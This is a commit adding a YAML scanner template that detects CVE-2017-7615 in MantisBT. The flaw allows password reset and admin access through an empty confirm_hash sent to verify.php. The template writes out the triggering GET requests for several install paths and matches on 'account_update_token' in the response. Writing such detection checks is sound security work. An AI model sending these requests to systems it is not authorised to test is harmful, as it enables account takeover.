add CVE-2017-7615

patch-1
root 2020-09-24 15:34:36 -03:00
parent c89904cc14
commit 114f83abc4
1 changed files with 27 additions and 0 deletions

27
cves/CVE-2017-7615.yaml Normal file
View File

@ -0,0 +1,27 @@
id: cve-2017-7615
info:
name: CVE-2017-7615
author: bp0lr
severity: high
description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
# Reference to exploit
# https://www.exploit-db.com/exploits/41890
requests:
- method: GET
path:
- "{{BaseURL}}/verify.php?id=1&confirm_hash="
- "{{BaseURL}}/mantis/verify.php?id=1&confirm_hash="
- "{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash="
- "{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash="
matchers-condition: and
matchers:
- type: word
words:
- "account_update_token"
part: body
- type: status
status:
- 200